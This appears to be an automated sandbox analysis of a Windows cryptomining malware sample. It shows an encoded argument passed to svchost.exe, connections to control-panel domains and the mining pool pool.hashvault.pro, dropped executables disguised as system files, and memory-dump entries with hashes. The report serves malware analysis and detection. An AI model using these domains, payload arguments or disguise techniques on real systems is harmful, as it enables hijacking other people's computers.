C:\Windows\System32\svchost.exe hfskhxmdoncbxhsb 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeX3kmtnE+A4/kpTs4bYyWrp/wFgbmXbsWjqh9oZ/M1b/FdNAlai2lZwJELqU72k+KI4FtoW5TMu6H23luli1wf6I7pu0SzW3Tj73Pjvsw7HSZV2tnuQ8sojipYC3GN3oEAkalK7UPatNIhplo7T6SOtcYad1Qs77navRkL3p2GZJ5VInmajAf/RsZFWvMtOi49x108jSO1zTsXbXgmMNlPbUrKjA2oYsEgpJazS3ZDJAGmClcDqJCSqwjjC493T8HsLpGXStaEGgC9/KHBykYmyKXJWVpqBCXZHxhDkiby7jruWwWa0vpzUekzqkZqGwnp71uTU7F7gpWfAuInQMHvYsKSqZJ4ZrwqC2ZBAeePSLf6piwVyDqnkjd+0+5jmfLE8b0dPPWnE958qeML3wS4KzKVjsAvvLwV3n3YFx27BFFJTpEfGBZCVZo5slabHJ3kRhUMcsEk62ykL30B21raMloiwhu2x5jZpdu6ptc4l7a5ns3Vua07XM33EXAEmFY2aqxlqDHC5BZ70BuqWLHvhbK2LgkK5p/Xg7NOqHeEtK5Ubrc8ajVg+XCgXsfVxWjlremzhUugs9Y6p4IpeUnaYAnrKxOGn4s1Zfbv+HYzVT/y2xM/nq6G6qXnjzWna/TFXFJ4hjtJP8rlqqGMpuTf2XZnAUxC+odUWKO3DMWNeDhN9nr6NzXALo2MXAcH5MZVlWyEWLTgaZHfHaqwXtNLImo2L/0pREVDnKxc7VvPAZcgVJK7ScKi0B+1xxAKCXmfG2isJSEvvQMPa8QHis2xGW/aBj/n7yTrVx9/Baz4D6O7fG+xSL+6yZlMlfEpnlEqOj4LqcDTYXnMsvGONJiqwY4QBKG11zoeKp0LhZGw0AeoKgDRsLMqBfqKTD1VHta0DKauKXxpdCRkkVC6Bd9zrx5qUkSKgt25zIyYLmBWsqkghh6eN+LYcphIB3jjhxdoFDleGlsag8D1ZdZL/bQ2+y4etWPYF2yu2wS8TJCnEM/E+58i4gY8XY8x8cQSnWHz36EQq6uCYbIgh/UY60BNWdAci2qeMAQ2Jnzmn6bMXb41pWTdh+xMtGuWHKDTicdCUSyPanZM35RI+qRBv3pOKQRrVr9Z98s826+3L7ErC15V+Pmor9PnEno9H0RpU3/Aj07/sdKSS8IQ4GNYUhRuHPtLe0Esvqi0VJKAuve5W9q9dVVoN4oaHyl4m/CXY5HiQdsf+XyL84XpMEpmGtuSHEi4nP1DZh6S6JwAp2rlyOeuHzk4ATfU6tIbZZl4JO/EhlYGP01grfWXfKALoYH4XW+B8ujwEp8FnWX+4FGugXL9Te07xCQPyD0uD9CDjXrucMQUPrV47rvgNQ+fG5bBdjtD4BBnPt+BMWpaeisLIndArUTxax2PMmh0u/LxUk48zticBsEDnEf0BZtBLIlvErippog15oi3FUPy8hxbGGb4I/kfTVTkMYUbjbEhQk1xPx48/Z5z8aPH5l7PwEJ3yWPnQIXJNbPGj+Y4yaNrXicuTLOU/RURcETfvkkGx9qt165n/H3eMS42wpGLpfo+9fLcyTjqow3asA0wi+ZrLrFKTkhNHhhc0gLTS30Z45XbgyhPQODvRYx1er+sdsZpMntAeZtoNiuKYXCpyFz9RU+m2K12GmGA0lmnUQPDjego/AZYLxQp3jjx5/vT0Z68AWucfOMvXxGitFBB1bAGU8B78Za/ZIMzxKAfg5aYW95vrp/E/4Fx/PZK7oXoemG8dWuzIcizvOVgXXqnnV5rBVA3EI374dfSTR8lSukJUOeknRzYAYIArYPln4OnhAOHiUzzqYfiK7v/VGomE9JKzgDv4g2kcqsN6PRPeFcLhBbv6KkgsbOrz/RjqlDcF7AHtIuRkDn+YIh7flp/kpILQVZkgUzuo5rvV9WGPgcDevxijjdTITnU30GQGlHUbAoHCrw1ieVVtvdLexq2af6XgmHCu4WH7/5ZMF/bAApfCRQ/6vIfNQWOEvNnoSmMqu2KPCfnaToC3+XHCW3tcdWNTR1N/l+6gJKlFFuPqx3fRvToK6YFKr7Ln3y7r6DfjTu7aoR3eZ6MpFm2uH/QhCnp4t8FmWae/pjJ1mCmaPvjKbXOy754C0wUY75Rk5dPOW5OV7FUH973Lt6bUmWWZzUqo5EIM4g8dZ3F8T0vLdh4SPGHiTKciwwlAloDiFNzwC7U+Nx0FkZzqKwSYiBF/jeVprrARJ8czizBuuMidAQnacpjJhhYuoTAUioE9pliSyjgtI4HW9q95TCsFi0Ow2BqsMsAwNiv05VFrQKrL5WYMeaMEqCSJCLr6j0ZD6CsezvOgFsc+ZyWc2Konpxr2SM7I4nt2Dv2kEqobkwzj8NN0+52NqLQRinaLR9EpvdgGYZeZtR41v+DY50dPTOmJLLj7tTkMc2+Kg19CJpIGk6VqE+3hH/TnOjkhfZuVPmLB6AW3jPb59YWpqVmhUKlFEUmX8qo+LS584OQ1AgMqOuPbB2JPaRd+lnIBrsdYn141ejE5qxlHMkUVHWo2uSGSu9CEWxq6ulv/QJ4OoddmZNvgofzJsHXxK/61JoCg0w2YP112mQYjgbBrwzqP0OAVtdYvY=
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | panel382523.site | udp |
| N/A | 31.31.198.106:80 | panel382523.site | tcp |
| N/A | 65.21.237.20:43077 | tcp | |
| N/A | 20.42.65.89:443 | tcp | |
| N/A | 8.8.8.8:53 | pool.hashvault.pro | udp |
| N/A | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| N/A | 8.8.8.8:53 | panel285626.site | udp |
| N/A | 31.31.198.99:80 | panel285626.site | tcp |
| N/A | 104.80.225.205:443 | tcp | |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 31.31.198.99:80 | panel285626.site | tcp |
Files
memory/4328-132-0x00000000005B0000-0x00000000005B8000-memory.dmp
memory/4328-133-0x0000000005440000-0x00000000059E4000-memory.dmp
memory/4328-134-0x0000000004F70000-0x0000000005002000-memory.dmp
memory/4328-135-0x0000000005100000-0x000000000510A000-memory.dmp
memory/4328-136-0x000000000C0F0000-0x000000000C112000-memory.dmp
memory/948-137-0x0000000000000000-mapping.dmp
memory/2712-138-0x0000000000000000-mapping.dmp
memory/3708-139-0x0000000000000000-mapping.dmp
memory/3708-140-0x00000000052A0000-0x00000000052D6000-memory.dmp
memory/3708-141-0x0000000005990000-0x0000000005FB8000-memory.dmp
memory/3708-142-0x0000000006170000-0x00000000061D6000-memory.dmp
memory/3708-143-0x00000000061E0000-0x0000000006246000-memory.dmp
memory/3708-144-0x0000000006850000-0x000000000686E000-memory.dmp
memory/3708-145-0x0000000007EA0000-0x000000000851A000-memory.dmp
memory/3708-146-0x0000000006D40000-0x0000000006D5A000-memory.dmp
memory/2860-147-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
memory/2596-150-0x0000000000000000-mapping.dmp
memory/4148-151-0x0000000000000000-mapping.dmp
memory/4268-152-0x0000000000000000-mapping.dmp
memory/4268-153-0x0000000000400000-0x0000000000436000-memory.dmp
memory/4268-154-0x00000000059C0000-0x0000000005FD8000-memory.dmp
memory/4268-155-0x0000000005460000-0x0000000005472000-memory.dmp
memory/4268-156-0x0000000005590000-0x000000000569A000-memory.dmp
memory/4268-157-0x00000000054C0000-0x00000000054FC000-memory.dmp
memory/2860-159-0x00007FF6C66A0000-0x00007FF6C7721000-memory.dmp
memory/2860-158-0x00007FF6C66A0000-0x00007FF6C7721000-memory.dmp
memory/4952-161-0x000001F6064F0000-0x000001F606512000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 232bf1281370e6421735155eb7e43bcf |
| SHA1 | 750b8511174215507bb3a78b8528947bbe915879 |
| SHA256 | 46d2d71b3dee82fc376f538852ce713364a13daa88b2f5993b5db79f38d1cc5d |
| SHA512 | 6e309b5fb0373996bff7496441efb49b05c89af4ce5a626f1f8bd21329dcf8d5e76c58eec0d8c2cd138da1b38181e03978975b2e46e891ce81b1234a82b33c58 |
memory/4268-163-0x0000000006880000-0x00000000068D0000-memory.dmp
memory/4268-164-0x0000000006950000-0x00000000069C6000-memory.dmp
memory/4952-165-0x00007FFF1C920000-0x00007FFF1D3E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4268-168-0x0000000007250000-0x0000000007412000-memory.dmp
memory/2984-167-0x0000000000000000-mapping.dmp
memory/4848-169-0x0000000000000000-mapping.dmp
memory/1320-170-0x00007FFF1C920000-0x00007FFF1D3E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9b80cd7a712469a4c45fec564313d9eb |
| SHA1 | 6125c01bc10d204ca36ad1110afe714678655f2d |
| SHA256 | 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d |
| SHA512 | ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584 |
memory/4268-172-0x0000000007F60000-0x000000000848C000-memory.dmp
memory/1180-173-0x0000000000000000-mapping.dmp
memory/2716-174-0x0000000000000000-mapping.dmp
memory/2500-175-0x0000000000000000-mapping.dmp
memory/4884-176-0x0000000000000000-mapping.dmp
memory/4500-177-0x0000000000000000-mapping.dmp
memory/4268-178-0x0000000007130000-0x000000000714E000-memory.dmp
memory/2800-179-0x0000000000000000-mapping.dmp
memory/1780-180-0x0000000000000000-mapping.dmp
memory/3384-181-0x0000000000000000-mapping.dmp
memory/2768-182-0x0000000000000000-mapping.dmp
memory/1320-183-0x00007FFF1C920000-0x00007FFF1D3E1000-memory.dmp
memory/2860-184-0x00007FF6C66A0000-0x00007FF6C7721000-memory.dmp
memory/2756-185-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba7cb450667ae5a5d0aa3c22fb67de4e |
| SHA1 | 9c79a1ba399162df82338195c90830d2cb2958c4 |
| SHA256 | 5f69208af4cb0214b67c4adf60890e7d9e01ee07d6365d511caf9938584d9ad0 |
| SHA512 | 6ddfb2ef606579c177d730b4d66671c4c66e19bf1a3faf485f34b5883d7319d1cf4e46d3f903a26732d6a9ce5c270e123fcf3085ec04000ec5a6d6d86a1a9404 |
memory/4568-186-0x0000000000000000-mapping.dmp
memory/1088-188-0x0000000000000000-mapping.dmp
memory/4364-189-0x0000000000000000-mapping.dmp
memory/3828-190-0x00007FFF1C920000-0x00007FFF1D3E1000-memory.dmp
memory/3664-191-0x0000000000000000-mapping.dmp
C:\Program Files\Windows\WindowsHost
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
memory/3828-193-0x00007FFF1C920000-0x00007FFF1D3E1000-memory.dmp
C:\Program Files\Windows\WindowsHost
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
memory/2576-195-0x00007FF6BADB0000-0x00007FF6BBE31000-memory.dmp
memory/2576-196-0x00007FF6BADB0000-0x00007FF6BBE31000-memory.dmp
memory/2932-198-0x00007FFF1DCA0000-0x00007FFF1E761000-memory.dmp
memory/2932-199-0x000002EF464A0000-0x000002EF464BC000-memory.dmp
memory/2932-200-0x000002EF46490000-0x000002EF4649A000-memory.dmp
memory/2932-201-0x000002EF464E0000-0x000002EF464FC000-memory.dmp
memory/2932-202-0x000002EF464C0000-0x000002EF464CA000-memory.dmp
memory/2932-203-0x000002EF473B0000-0x000002EF473CA000-memory.dmp
memory/2932-204-0x000002EF464D0000-0x000002EF464D8000-memory.dmp
memory/2932-205-0x000002EF46500000-0x000002EF46506000-memory.dmp
memory/2932-206-0x000002EF47390000-0x000002EF4739A000-memory.dmp
memory/2932-207-0x00007FFF1DCA0000-0x00007FFF1E761000-memory.dmp
memory/2620-208-0x0000000000000000-mapping.dmp
memory/4864-209-0x0000000000000000-mapping.dmp
memory/4968-210-0x0000000000000000-mapping.dmp
memory/2400-211-0x0000000000000000-mapping.dmp
memory/864-212-0x0000000000000000-mapping.dmp
memory/2140-213-0x0000000000000000-mapping.dmp
memory/3908-214-0x0000000000000000-mapping.dmp
memory/3008-215-0x0000000000000000-mapping.dmp
memory/5104-217-0x0000000000000000-mapping.dmp
memory/3396-216-0x0000000000000000-mapping.dmp
memory/4376-218-0x0000000000000000-mapping.dmp
memory/4088-219-0x0000000000000000-mapping.dmp
memory/3624-220-0x0000000000000000-mapping.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
memory/4948-222-0x0000000000000000-mapping.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b42c70c1dbf0d1d477ec86902db9e986 |
| SHA1 | 1d1c0a670748b3d10bee8272e5d67a4fabefd31f |
| SHA256 | 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a |
| SHA512 | 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5 |
memory/4964-224-0x00007FFF1DCA0000-0x00007FFF1E761000-memory.dmp
memory/2576-225-0x00007FF6BADB0000-0x00007FF6BBE31000-memory.dmp
memory/4964-226-0x0000022E58C29000-0x0000022E58C2F000-memory.dmp
memory/4964-227-0x0000022E58C29000-0x0000022E58C2F000-memory.dmp
memory/4964-228-0x00007FFF1DCA0000-0x00007FFF1E761000-memory.dmp
memory/1464-229-0x00007FF7C37814E0-mapping.dmp
memory/2736-230-0x0000000000000000-mapping.dmp
memory/2216-231-0x00007FF620AA2720-mapping.dmp
memory/2216-232-0x000001AB2CBC0000-0x000001AB2CBE0000-memory.dmp
C:\Program Files\Google\Libs\g.log
| MD5 | fdba80d4081c28c65e32fff246dc46cb |
| SHA1 | 74f809dedd1fc46a3a63ac9904c80f0b817b3686 |
| SHA256 | b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398 |
| SHA512 | b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29 |
memory/2576-234-0x00007FF6BADB0000-0x00007FF6BBE31000-memory.dmp
memory/2216-235-0x00007FF6202B0000-0x00007FF620AA4000-memory.dmp
memory/2216-236-0x000001AB2D260000-0x000001AB2D2A0000-memory.dmp
memory/2216-237-0x00007FF6202B0000-0x00007FF620AA4000-memory.dmp
memory/2216-238-0x000001AB2D2E0000-0x000001AB2D300000-memory.dmp
memory/2216-239-0x000001AB2D2E0000-0x000001AB2D300000-memory.dmp
memory/2216-240-0x000001AB2D2E0000-0x000001AB2D300000-memory.dmp
memory/2216-241-0x000001AB2D300000-0x000001AB2D320000-memory.dmp
memory/2216-242-0x000001AB2D2E0000-0x000001AB2D300000-memory.dmp
memory/2216-243-0x000001AB2D300000-0x000001AB2D320000-memory.dmp